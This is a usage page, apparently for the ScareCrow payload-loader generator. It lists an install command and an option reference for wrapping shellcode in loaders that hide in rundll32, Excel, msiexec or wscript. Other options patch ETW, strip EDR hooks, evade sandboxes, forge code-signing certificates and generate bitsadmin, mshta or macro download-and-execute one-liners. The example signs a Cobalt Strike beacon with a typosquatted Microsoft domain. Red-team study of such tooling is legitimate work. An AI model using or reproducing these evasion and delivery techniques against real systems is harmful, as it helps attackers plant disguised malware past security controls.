Project URL: https://github.com/optiv/scarecrow
Installation: first install golang, openssl, osslsigncode and mingw-w64:

    apt install golang openssl osslsigncode mingw-w64 -y

Running ./ScareCrow -h prints the banner (ASCII art omitted here) with its built-in quote:

    “…you must understand is more than a mere obstacle. Fear is a teacher. The first one you ever had.”

followed by the option reference:

    Usage of ./ScareCrow:
      -I string
            Path to the raw 64-bit shellcode.
      -Loader string
            Sets the type of process that will sideload the malicious payload:
            [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading)
            [*] control - Loads a hidden control applet - the process name would be rundll32. If -O is specified a JScript loader will be generated.
            [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
            [*] excel - Loads into a hidden Excel process using a JScript loader.
            [*] msiexec - Loads into msiexec process using a JScript loader.
            [*] wscript - Loads into wscript process using a JScript loader.
      -O string
            Name of output file. If Loader is set to dll or binary this option is not required.
      -configfile string
            The path to a json based configuration file to generate custom file properties instead of the default ones.
      -console
            Only for binary payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
      -delivery string
            Generates a one-liner command to download and execute the payload remotely:
            [*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader. (Compatible with Binary, Control, Excel and Wscript Loaders (.js or .hta files))
            [*] hta - Generates a blank hta file containing the loader along with a mshta command to execute the loader remotely in the background. (Compatible with Control and Excel loaders)
            [*] macro - Generates an office macro that will download and execute the loader remotely. (Compatible with Control, Excel and Wscript Loaders)
      -domain string
            The domain name to use for creating a fake code signing cert.
      -etw
            Enables ETW patching to prevent ETW events from being generated.
      -injection string
            Enables Process Injection Mode and specify the path to the process to create/inject into (use \ for the path).
      -password string
            The password for code signing cert. Required when -valid is used.
      -sandbox
            Enables sandbox evasion using IsDomainedJoined calls.
      -unmodified
            When enabled will generate a DLL loader that will not remove the EDR hooks in system DLLs and only use custom syscalls (set to false by default).
      -url string
            URL associated with the Delivery option to retrieve the payload.
      -valid string
            The path to a valid code signing cert. Used instead of -domain if a valid code signing cert is desired.

Usage. Basic usage: generate a 64-bit raw payload with CS.
    ./ScareCrow -I beacon.bin -domain www.microft.com -etw -sandbox
    # -I: the raw shellcode file
    # -domain: the domain name used for the signing cert
    # -etw: no ETW